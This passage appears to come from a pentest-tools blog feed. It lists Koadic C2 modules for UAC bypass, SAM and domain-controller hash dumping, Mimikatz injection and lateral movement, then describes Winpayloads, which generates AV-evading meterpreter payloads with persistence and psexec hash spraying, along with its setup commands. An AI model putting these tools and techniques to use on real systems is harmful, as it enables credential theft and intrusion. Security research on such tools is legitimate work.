Uses enigma0x3’s eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10. implant/elevate/bypassuac_sdclt Uses enigma0x3’s sdclt.exe exploit to bypass UAC on Windows 10. implant/fun/zombie Maxes volume and opens The Cranberries YouTube in a hidden window. implant/fun/voice Plays a message over text-to-speech. implant/gather/clipboard Retrieves the current content of the user clipboard. implant/gather/hashdump_sam Retrieves hashed passwords from the SAM hive. implant/gather/hashdump_dc Domain controller hashes from the NTDS.dit file. implant/inject/mimikatz_dynwrapx Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X). implant/inject/mimikatz_dotnet2js Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS). implant/inject/shellcode_excel Runs arbitrary shellcode payload (if Excel is installed). implant/manage/enable_rdesktop Enables remote desktop on the target. implant/manage/exec_cmd Run an arbitrary command on the target, and optionally receive the output. implant/pivot/stage_wmi Hook a zombie on another machine using WMI. implant/pivot/exec_psexec Run a command on another machine using psexec from sysinternals. implant/scan/tcp Uses HTTP to scan open TCP ports on the target zombie LAN. implant/utils/download_file Downloads a file from the target zombie. implant/utils/upload_file Uploads a file from the listening server to the target zombies. DisclaimerCode samples are provided for educational purposes. Adequate defenses can only be built by researching attack techniques available to malicious actors. Using this code against target systems without prior permission is illegal in most jurisdictions. The authors are not liable for any damages from misuse of this information or code.Creators@Aleph___Naught@The_Naterz@JennaMagius@zerosum0x0Contributors@vvalien1fbctfcclausArno0xdelirious-lettuceAcknowledgementsSpecial thanks to research done by the following individuals:@subTee@enigma0x3@tiraniddo@harmj0y@gentilkiwi@mattifestationclymb3rDownload Koadic

Link: http://feedproxy.google.com/~r/PentestTools/~3/4r9r5eiQR9E/koadic-com-command-control-framework.html

Winpayloads – Undetectable Windows Payload Generation

Winpaylods is a payload generator tool that uses metasploits meterpreter shellcode, injects the users ip and port into the shellcode and writes a python file that executes the shellcode using ctypes. This is then aes encrypted and compiled to a Windows Executable using pyinstaller.Main features:Undetectable Windows Payload GenerationEasy to Use GuiUpload Payload to Local WebServerPsexec Payload to Target MachineAutomatically Runs Metasploit Listener with Correct Settings after Payload GeneratedWinpayloads also comes with a few features such as uac bypass and payload persistence. These are powershell files that execute on the system when the meterpreter gets a reverse shell. The uac bypass is written by PowerShellEmpire and uses an exploit to bypass uac on local administrator accounts and creates a reverse meterpreter running as local administrator back to the attackers machine.Winpayloads can also setup a SimpleHTTPServer to put the payload on the network to allow downloading on the target machine and also has a psexec feature that will execute the payload on the target machine if supplied with usernames, domain, passwords or hashes. psexec.py – imacket exampleFeaturesUACBypass – PowerShellEmpire https://github.com/PowerShellEmpire/Empire/raw/master/data/module_source/privesc/Invoke-BypassUAC.ps1 Copyright (c) 2015, Will Schroeder and Justin Warner. All rights reserved.PowerUp – PowerShellEmpire https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 Copyright (c) 2015, Will Schroeder and Justin Warner. All rights reserved.Invoke-Shellcode https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1 Copyright (c) 2012, Matthew Graeber. All rights reserved.Invoke-Mimikatz https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1 Copyright (c) 2012, Matthew Graeber. All rights reserved.Invoke-EventVwrBypass https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1 Matt Nelson (@enigma0x3)Persistence – Adds payload persistence on rebootPsexec Spray – Spray hashes until successful connection and psexec payload on targetUpload to local webserver – Easy deploymentPowershell stager – allows invoking payloads in memory & moreGetting Startedgit clone https://github.com/nccgroup/winpayloads.gitcd winpayloads./setup.sh will setup everything needed for WinpayloadsStart Winpayloads ./Winpayloads.pyType ‘help’ or ‘?’ to get a detailed help page setup.sh -r will reinstallDownload Winpayloads

Link: http://feedproxy.google.com/~r/PentestTools/~3/jpBeM5iD4g4/winpayloads-undetectable-windows.html